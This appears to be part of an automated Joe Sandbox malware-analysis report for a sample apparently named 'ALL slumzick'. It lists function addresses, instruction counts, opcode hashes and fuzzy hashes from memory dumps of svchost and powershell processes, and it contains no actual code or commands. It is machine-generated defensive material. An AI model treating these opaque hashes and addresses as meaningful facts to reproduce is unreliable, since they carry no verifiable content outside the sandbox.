                                                                    Function 00007FF6BA6576D8 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2781157811.00007FF6BA531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BA530000, based on PE: true
                                                                    • Associated: 00000004.00000002.2781123767.00007FF6BA530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2781522963.00007FF6BA65A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2781836898.00007FF6BA6AD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2781899482.00007FF6BA6AE000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2782686013.00007FF6BB313000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2782746031.00007FF6BB316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff6ba530000_ALL slumzick.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: b1488acaea070bf80970ebac23d484e33d4d0e496b0cdd96a84dd8028e887239
                                                                    • Instruction ID: 3c9d47a45aed676b8db897b92ce4d0a251720919413b373911a214c6d74bde67
                                                                    • Opcode Fuzzy Hash: b1488acaea070bf80970ebac23d484e33d4d0e496b0cdd96a84dd8028e887239
                                                                    • Instruction Fuzzy Hash: 9F111862B14B058AEB008F64E8552A833A4FB19B58F440E31EF6DC67A4EF78D5959340

                                                                    Executed Functions

                                                                    Function 00007FF7C0CF1719 Relevance: .7, Instructions: 709COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: affeeadaf4362e01190fca9923cbc1edac5527d8cc3e31e93db140ea6f44256e
                                                                    • Instruction ID: 545305679a657721af29d834c85c3f6976e7a8e6f510d0a84cef1124147000b8
                                                                    • Opcode Fuzzy Hash: affeeadaf4362e01190fca9923cbc1edac5527d8cc3e31e93db140ea6f44256e
                                                                    • Instruction Fuzzy Hash: 58229670E18A594FE798FB2884656B9B6D2FF98760F94457DD40EC33D2DE28B8018782
                                                                    Function 00007FF7C0CF20F1 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43bb2897e20d9a0f905d83d564c44f5fae4cb38fb132860133997118b6d7f708
                                                                    • Instruction ID: bd380e4003a5d6aa5b7b069f4c876cf98fbc6d4bb14f4ad58cab92911a73b9c1
                                                                    • Opcode Fuzzy Hash: 43bb2897e20d9a0f905d83d564c44f5fae4cb38fb132860133997118b6d7f708
                                                                    • Instruction Fuzzy Hash: 31513320A0D6C94FD756AB7C58242B9BFD5DF47265B0801FAE0C9C7293DE186C06C396
                                                                    Function 00007FF7C0CF0AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    • Opcode ID: 748661802d5d7e6cf93db5df03d23a11e1664e1673306f335ca20e818fb137fd
                                                                    • Instruction ID: bb8d856c22b8ab12a18e3b2eb04a9f209afe6fe7736258f64982f928265eef56
                                                                    • Opcode Fuzzy Hash: 748661802d5d7e6cf93db5df03d23a11e1664e1673306f335ca20e818fb137fd
                                                                    • Instruction Fuzzy Hash: 14610372A0891A4FE711BBBCA8522FC7BA0EF94365B544576D109C7393CF28B44683D5
                                                                    Function 00007FF7C0CF0E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    • Opcode ID: 4b517a70f67696882b39bed16124c43d8d95e0fccf5b85bd4a2c68a0930073c2
                                                                    • Instruction ID: ddf169a5e9fd54dc59890dd9267bdce22f193421b75664a52f7c173f1381aa8b
                                                                    • Opcode Fuzzy Hash: 4b517a70f67696882b39bed16124c43d8d95e0fccf5b85bd4a2c68a0930073c2
                                                                    • Instruction Fuzzy Hash: D3511821A0DA860FE366A77C58662F57FE1DF86270B0941FBD08DC7293DD1CAC428362
                                                                    Function 00007FF7C0CF1295 Relevance: .5, Instructions: 471COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f623ca23feed7d5611728e198ba4a896b8b46819efa5fa1fdf54a7857794f9f6
                                                                    • Instruction ID: a9cf6aeea3c68b7a5b62f7e4bcdbb3f27a3b083bff4a03fb3781d7862b30129b
                                                                    • Opcode Fuzzy Hash: f623ca23feed7d5611728e198ba4a896b8b46819efa5fa1fdf54a7857794f9f6
                                                                    • Instruction Fuzzy Hash: E3210732A086554FD701FB7CE8612E9BBA0FF82365B444677C089DB293DF28741687D5
                                                                    Function 00007FF7C0CF0985 Relevance: .3, Instructions: 339COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d471451086eb00a4bfafbdacff758dec27eae8bc761a47bd146c142de4a61c54
                                                                    • Instruction ID: e8e851fc326a61932d66bb8904cd7139f3221790e53a7fb4de0adddab50bec80
                                                                    • Opcode Fuzzy Hash: d471451086eb00a4bfafbdacff758dec27eae8bc761a47bd146c142de4a61c54
                                                                    • Instruction Fuzzy Hash: 24A13576B08A164FD701BB7CB8522F97BA0EF963B1B544177C149CB293CA24B08AC7D1
                                                                    Function 00007FF7C0CF09D3 Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3f88bbe81e793c5a808de2e43cd2979ef6bb56e37ad27514cc4b1630c684b150
                                                                    • Instruction ID: 723b8bf60a12b9e9c222ba9aa182a9dd593f7e6c6c0aaab70bb11e8219e58109
                                                                    • Opcode Fuzzy Hash: 3f88bbe81e793c5a808de2e43cd2979ef6bb56e37ad27514cc4b1630c684b150
                                                                    • Instruction Fuzzy Hash: 5F914466B0891A4BD700BB7CB8522FD7BA0EF953B2B548577C149CB293CA24B097C7D1
                                                                    Function 00007FF7C0CF0A08 Relevance: .3, Instructions: 297COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 077bfb0dc1918013bd48e42326736f8ffc9beac4d45bf356058381f2f8bc73f1
                                                                    • Instruction ID: 814d705303167eed67bab718bf31138e26c9ec9eee22f9f94d7005f758727224
                                                                    • Opcode Fuzzy Hash: 077bfb0dc1918013bd48e42326736f8ffc9beac4d45bf356058381f2f8bc73f1
                                                                    • Instruction Fuzzy Hash: C3816476B0891A4BD701BB7CB8522FD7BA0EF953B1B548677C109CB293CA24B096C7D1
                                                                    Function 00007FF7C0CF0A10 Relevance: .3, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 466faf4d774ff08693f2d29cf0931dc51fbfc7f44ecb343597b1d8a50dd94b97
                                                                    • Instruction ID: 337a4390b359a18d4319c67db9aaf311848b17d6c44f9643cdd7b4a432facdf6
                                                                    • Opcode Fuzzy Hash: 466faf4d774ff08693f2d29cf0931dc51fbfc7f44ecb343597b1d8a50dd94b97
                                                                    • Instruction Fuzzy Hash: B8815476B0891A4BD700BB7CB8122FD7BA4EF953B1B548677D109CB293CA24B096C7D1
                                                                    Function 00007FF7C0CF0A48 Relevance: .3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdb5e445a013c00d0ec55c6985777f9cf690615f13c5a09f91c44b118cebc912
                                                                    • Instruction ID: f3f0bb378c496c2c7bc93643b0e63b68e12f922df3ecf503362a7020ad432222
                                                                    • Opcode Fuzzy Hash: bdb5e445a013c00d0ec55c6985777f9cf690615f13c5a09f91c44b118cebc912
                                                                    • Instruction Fuzzy Hash: 62715376B0891A4BD701BB7CB8522FD7BA0EF953B1B544276D109C7293CB24B086C7D1
                                                                    Function 00007FF7C0CF0638 Relevance: .1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d0c0ad34731639256d92cabecb4e67fad2f5270b81ff92faf5ed4e0bef07094
                                                                    • Instruction ID: 84a2b3243801a962fef7728166a6a55fd1a3ca25c626bb1d531c61089a25208f
                                                                    • Opcode Fuzzy Hash: 8d0c0ad34731639256d92cabecb4e67fad2f5270b81ff92faf5ed4e0bef07094
                                                                    • Instruction Fuzzy Hash: 3531B520B18D490FE798EB6C9459779B6C2EF99365F4402BEE40EC3293DE64AC428381
                                                                    Function 00007FF7C0CF0D21 Relevance: .1, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction ID: 214d573e6046248d1f216fa0e5bd2fe39fb2da46c0c8e9a21704af53be126d02
                                                                    • Opcode Fuzzy Hash: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction Fuzzy Hash: 4A31A361B18A094FE744BBBC581A7FDB6D5EF98761F54427AE10DC3283DE28B8418392
                                                                    Function 00007FF7C0CF0BD3 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0542697014f264c7162d1db7f1910c0cef4f2754fa757965d7c6fc8d2abad725
                                                                    • Instruction ID: 48ae3f315b735dae772e51fa1e6ef63397c4e256d050c64284f6def70ff337dc
                                                                    • Opcode Fuzzy Hash: 0542697014f264c7162d1db7f1910c0cef4f2754fa757965d7c6fc8d2abad725
                                                                    • Instruction Fuzzy Hash: B5418170E19A0D8FDB44EB6898656EDBBB1FF99311F540579D009C3392CE38B805C792
                                                                    Function 00007FF7C0CF0858 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec4864efb490e955e8dae79f88880369f44c53285e114d735de0bb4f8029ba36
                                                                    • Instruction ID: ff805d7d0c9016e0bc360855588df2f168d36daa2e8f1074d0498109db04b15b
                                                                    • Opcode Fuzzy Hash: ec4864efb490e955e8dae79f88880369f44c53285e114d735de0bb4f8029ba36
                                                                    • Instruction Fuzzy Hash: B331D1A1E5964E5FD344EB2C98B55E9BFB1EF99300B8484A9D00AC7387DF34B810C792
                                                                    Function 00007FF7C0CF0870 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02540506b0ba2ec298a880c9186c9204d887efa5c3af5416e75ae2c67ee7d28e
                                                                    • Instruction ID: 541e30050e8c1eea11064c68d94758b0546129260376e597b48f8e6d03887da5
                                                                    • Opcode Fuzzy Hash: 02540506b0ba2ec298a880c9186c9204d887efa5c3af5416e75ae2c67ee7d28e
                                                                    • Instruction Fuzzy Hash: B221ADA0E9964E5FD344EB2C98B55B9BF71EF98300B8084A9D40AC3386DF34B910C792
                                                                    Function 00007FF7C0CF22C1 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e8cbea2d21083a8a09577fe551329648cb889e7c2ea2787ee1327ff4bbdc7f6
                                                                    • Instruction ID: 2b080ff8c42c1c11502859321e796925a978dc1485f44f26e95c24ca8620a9fd
                                                                    • Opcode Fuzzy Hash: 9e8cbea2d21083a8a09577fe551329648cb889e7c2ea2787ee1327ff4bbdc7f6
                                                                    • Instruction Fuzzy Hash: 83014E55D0D6C10FE751BB385865175BFE0DF91220B8804AAD988C72E7DD08F94583D3

                                                                    Executed Functions

                                                                    Function 00007FF7C0DA6605 Relevance: .4, Instructions: 432COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5de96bc53ec456e857de6abbd89c7f416eeb3f629791d03b2c6e508604bf380d
                                                                    • Instruction ID: dbfeb5cde40137fb8b9a7683d6ff184c860a8e154740c744467af3a110549771
                                                                    • Opcode Fuzzy Hash: 5de96bc53ec456e857de6abbd89c7f416eeb3f629791d03b2c6e508604bf380d
                                                                    • Instruction Fuzzy Hash: A1D1487190DA898FEB55AF3888155B9BBA4FF06364B4801FEE04DC72D3DA18BC15C3A1
                                                                    Function 00007FF7C0CD9756 Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 321e73b9e10a840e9ae84abd2355c57e8f0bd8567b76c1ddac83dcfaf91e3e86
                                                                    • Instruction ID: 6a7fd0f13fb0de70ce98b27be23949319df0f9547437b609cf55105281ae3441
                                                                    • Opcode Fuzzy Hash: 321e73b9e10a840e9ae84abd2355c57e8f0bd8567b76c1ddac83dcfaf91e3e86
                                                                    • Instruction Fuzzy Hash: B031C87191CB489FDB589F5CA8066F9BBE1FB99710F40422FE449D3252DB70B8158BC2
                                                                    Function 00007FF7C0BBE380 Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1674695375.00007FF7C0BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0BBD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0bbd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3af6e7c26f32c96e57d9a63c868d176669688f59950cc418ce2e070adb95832
                                                                    • Instruction ID: e4be5ae6e69387b8087661166a82fccabd1b0c7e898d2a05d4b32243fb2ecbd6
                                                                    • Opcode Fuzzy Hash: f3af6e7c26f32c96e57d9a63c868d176669688f59950cc418ce2e070adb95832
                                                                    • Instruction Fuzzy Hash: 6241017080DBC44FE756DF2898459527FF0EF52320B1505EFE489CB2A3D629B84AC7A2
                                                                    Function 00007FF7C0CDA62C Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74097fd03e31982686b08d060ca3b28addda2288284c63068351802987ba7558
                                                                    • Instruction ID: 75542b8b81f418cd374a8bda399806f18728895604eeffb74aa4f50f4e3f08b8
                                                                    • Opcode Fuzzy Hash: 74097fd03e31982686b08d060ca3b28addda2288284c63068351802987ba7558
                                                                    • Instruction Fuzzy Hash: 1921D83190CB4C8FDB59DFAC984A7E97BF0EB96321F04416BD049C3152DA74A45ACB91
                                                                    Function 00007FF7C0CD33B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: 4f9f3889a377c08dcfde1f69c3270b95b9375c8996e9aaf60aacf75038a288f1
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: 9D01677115CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB46
                                                                    Function 00007FF7C0DA414D Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7126c61c63f6074ca8ff10e064bcc06920929d28276a0acfcb2cab97d9fbcf0
                                                                    • Instruction ID: b178c23586c089b96115840118055f23efb5967013fe18c1d9ab995b94dc7bb5
                                                                    • Opcode Fuzzy Hash: b7126c61c63f6074ca8ff10e064bcc06920929d28276a0acfcb2cab97d9fbcf0
                                                                    • Instruction Fuzzy Hash: BFF0BE32A0CA088FD698EB0CE4004A8B3E0FF9433175100BAE05DC77A7CB25FC948790
                                                                    Function 00007FF7C0DA4400 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c560b9c9e5f9e65303bbe37a3766d12504f5c13f96c261c886edf4c5a1fbb27
                                                                    • Instruction ID: 656d7539aed1ac49c4f683dab07f59281c069acfc01c8d11d2dc9dae0f32d3cd
                                                                    • Opcode Fuzzy Hash: 6c560b9c9e5f9e65303bbe37a3766d12504f5c13f96c261c886edf4c5a1fbb27
                                                                    • Instruction Fuzzy Hash: 3DF0BE31A0C6488FD754EB0CE4405A8B3E0FF8832178100B6E059C7693CB69BC5487A0
                                                                    Function 00007FF7C0DA41D1 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: 2cda973fc30cbc659bbd4915eadeb9b986d903964666e6c6965fdc1df9e9fcf1
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: 90E0123170C5048FD6A8EF0CE0409A9B3E1EB9833175101B7D14EC7661C721FC918BD0
                                                                    Function 00007FF7C0CDA2A9 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05c13cbc7836436d9360719029455e2d70194ab4226e9800c4b562ef5b58bea7
                                                                    • Instruction ID: edb303bdfa044daadf3719b115c1a6f625758f19ce62950c12aeeba1391f3e8f
                                                                    • Opcode Fuzzy Hash: 05c13cbc7836436d9360719029455e2d70194ab4226e9800c4b562ef5b58bea7
                                                                    • Instruction Fuzzy Hash: 5DE04F31914A4C8FCB45EF18D8199E97BA0FB69305F01029BA80DC7161DB30AA58CBC2

                                                                    Non-executed Functions

                                                                    Function 00007FF7C0CD8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                                    • API String ID: 0-622050427
                                                                    • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                    • Instruction ID: b12b489fb68b6187f41998490a947116b5a51fabe916167fddc1b5390a466593
                                                                    • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                    • Instruction Fuzzy Hash: D92126B76085658FD3027B7DBC05AE93784CFA43B478543B2E198CB183FE1470968AD4

                                                                    Executed Functions

                                                                    Function 00007FF7C0DA6605 Relevance: .4, Instructions: 432COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e67da30f1eefd534ad859ab723d643b897ce38d51c27514e60b53c309ad2771
                                                                    • Instruction ID: 273cf5c124eca316c95ce7885724b263ce6b0bcc893197c93ced3aadbb36435d
                                                                    • Opcode Fuzzy Hash: 5e67da30f1eefd534ad859ab723d643b897ce38d51c27514e60b53c309ad2771
                                                                    • Instruction Fuzzy Hash: F5D1373191DA898FE755AF3888155B9BBA5FF06364B4801FEE04DC72D3DA28BC15C3A1
                                                                    Function 00007FF7C0CD9750 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
